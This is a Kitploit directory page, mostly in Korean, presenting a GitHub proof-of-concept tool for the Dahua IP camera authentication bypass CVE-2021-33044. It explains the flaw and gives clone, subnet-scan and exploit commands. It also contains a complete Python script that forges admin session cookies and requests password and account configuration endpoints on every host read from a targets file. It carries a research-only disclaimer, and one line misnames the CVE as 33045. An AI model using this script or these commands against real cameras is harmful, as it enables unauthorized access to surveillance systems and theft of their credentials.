Skip to content
KitploitKITPLOIT
도구블로그
제출
도구블로그
제출

해킹, 침투 테스트 및 사이버 보안 도구를 당신의 보안 무기고에!

Kitploit은 해킹, 사이버 보안 및 침투 테스트 도구 디렉토리입니다. 최신 프로젝트 업데이트를 발견하여 취약점을 찾고, 시스템을 분석하고, 테스트를 자동화하고, 보안을 강화하세요.

··피드·문의·개인정보·© 2026 Kitploit

도구 디렉토리

카테고리

모든 카테고리 보기
Loading categories
Camera-Dahua-Research-l-h-ng-CVE-2021-33044 — DAHUA_AUTH-BYPASS-CVE-2021-33044 | Kitploit
도구/GitHubGitHub/litndat/camera-dahua-research-l-h-ng-cve-2021-33044
Authentication & AuthorizationIoT SecurityVulnerability AnalysisExploitationWeb Application ExploitationPenetration TestingLearning & EducationRed Teaming

인기

모두 보기 →

커뮤니티에서 가장 많이 사용되는 도구를 찾아보세요.

모든 도구 탐색

도구 컬렉션을 둘러보세요

모든 도구 보기 →
공유
GitHub
litndat/camera-dahua-research-l-h-ng-cve-2021-33044

Camera-Dahua-Research-l-h-ng-CVE-2021-33044

DAHUA_AUTH-BYPASS-CVE-2021-33044

저장소 보기
92개월 전아직 검토되지 않음

Dahua Authentication Bypass PoC 모의 악용 (CVE-2021-33044)

개요

Dahua IP 카메라는 보안 감시 시스템에서 널리 사용되는 IoT 장치입니다. 내부 네트워크에 배포되거나 인터넷을 통해 접근되는 경우가 많기 때문에 IP 카메라의 보안 취약점은 개인정보 보호와 정보 보안에 심각한 영향을 미칠 수 있습니다.

CVE-2021-33045는 일부 Dahua 카메라 모델에 존재하는 보안 취약점으로, 유효한 인증 없이 내부 구성 리소스에 대한 무단 접근을 허용합니다. 이 취약점은 장치 펌웨어의 엄격하지 않은 접근 제어 메커니즘에서 비롯됩니다.

취약점 정보

항목내용
CVECVE-2021-33044
유형Authentication Bypass
심각도Critical (CVSS ~9.8)
인증인증 불필요
영향Dahua Camera / DVR / NVR

원인

이 취약점은 Dahua 카메라 펌웨어의 안전하지 않은 인증 설계에서 비롯됩니다:

  • 서버가 session/token을 올바르게 검증하지 않음
  • 클라이언트에서 보낸 데이터를 신뢰함
  • 일부 민감한 구성 엔드포인트는 쿠키 존재 여부만 확인하고 실제 접근 권한을 검증하지 않음

이로 인해 공격자는 다음을 수행할 수 있습니다:

  • 인증 프로세스를 위조
  • 로그인을 완전히 우회

참고:

  • NVD CVE-2021-33044
  • http://seclists.org/fulldisclosure/2021/Oct/13

인증 우회 메커니즘의 작동 방식

일반적인 흐름

root@kitploit:~
→ Client gửi HTTP request kèm cookie tùy ý
→ Camera kiểm tra cookie ở mức giao diện
→ Không xác minh session hợp lệ ở backend
→ Cho phép truy cập trực tiếp vào các endpoint cấu hình nội bộ
→ Trả về dữ liệu nhạy cảm

시나리오

File목적CVEs

사용 방법

설치

root@kitploit:~
# Clone repository
git clone https://github.com/eagle-nett/DAHUA_AUTH-BYPASS-CVE-2021-33044.git
cd DAHUA_AUTH-BYPASS-CVE-2021-33044

pip install requests

네트워크 스캔

root@kitploit:~
# Scan subnet (ports required)
python dahua_scanner.py https://example.com -p 80 8080 8800

# Single host with port
python dahua_scanner.py https://example.com

일반적인 Dahua 포트: 80,443, 8080, 37777, 37778

CVE 취약점 악용

root@kitploit:~
python dahua_exploit.py https://example.com -p 8081
python dahua_exploit.py https://example.com -c 2021-33044  #CVE
python dahua_exploit.py --help

인증 우회

root@kitploit:~
python dahua_auth_bypass.py https://example.com -p 8080
python dahua_auth_bypass.py https://example.com  # Dump thiết bị sau khi bypass

예제

root@kitploit:~
#!/usr/bin/env python3
import requests, sys
requests.packages.urllib3.disable_warnings()

def dump_accounts(ip, port=80):
    base = f"http://{ip}:{port}"
    cookies = {
        "userName": "admin",
        "userLevel": "1",
        "sessionID": "00000000"
    }
    urls = [
        "/current_config/passwd",
        "/current_config/Account1",
        "/current_config/UserMgr",
        "/current_config/accounts"
    ]

    for path in urls:
        try:
            r = requests.get(
                base + path,
                cookies=cookies,
                verify=False,
                timeout=8
            )
            if r.status_code == 200 and len(r.text) > 30:
                print(f"[+] {ip}:{port}  VULNERABLE → {path}")
                return
        except:
            pass

    print(f"[-] {ip}:{port}  safe / patched")

for line in open("targets.txt"):
    t = line.strip()
    if not t or t.startswith("#"):
        continue
    ip = t.split(":")[0]
    port = int(t.split(":")[1]) if ":" in t else 80
    dump_accounts(ip, port)

설명

  • 스크립트는 requests 라이브러리를 사용하며 SSL 경고를 적극적으로 비활성화합니다.

  • dump_accounts(ip, port=80) 함수는 카메라 장치 하나를 검사하는 핵심 함수입니다. 함수의 주요 기능은 다음과 같습니다:

    • IP 주소와 포트로 URL 구성
    • 쿠키를 통한 관리자 로그인 상태 시뮬레이션
    • 민감한 구성 엔드포인트에 요청 전송
    • 응답을 분석하여 장치가 영향을 받는지 여부 확인
  • 인증 쿠키를 시뮬레이션합니다. 함수는 다음과 같은 쿠키 값을 사용합니다:

    • userName=admin
    • userLevel=1
    • sessionID=00000000
  • 영향을 받는 카메라 버전에서 백엔드는 실제 sessionID를 검증하지 않으므로 시스템은 해당 요청이 유효한 관리자 계정에서 전송된 것으로 신뢰합니다.

대상 목록 처리 반복문

스크립트는 입력 파일에서 대상 목록을 읽고 각 장치에 대해 검사 함수를 차례로 호출합니다. 이 접근 방식을 통해 여러 카메라를 자동으로 평가할 수 있습니다.

image

개발 과정

이 스크립트들은 다음을 기반으로 개발되었습니다:

  • NVD에서 공개한 CVE 세부 정보
  • Dahua 보안 공지
  • 공개 PoC 참고 자료 (seclists.org, packetstormsecurity)

테스트 상태:

  • 인증 우회 로직은 CVE 사양에 따라 구현됨
  • 취약한 장치에 대한 제한적인 테스트 수행

주의사항

이 프로젝트는:

  • 학습 및 연구 목적으로만 사용하십시오
  • 개인 랩 환경에서 실행하십시오
도구 다운로드
dahua_scanner.py네트워크 탐색 — 서브넷에서 Dahua 카메라 검색탐지
dahua_exploit.pyMulti-CVE 스캐너 — 모든 보안 취약점을 검사합니다.전체
dahua_auth_bypass.py--dump 옵션을 지원하는 전용 인증 우회CVE-2021-33044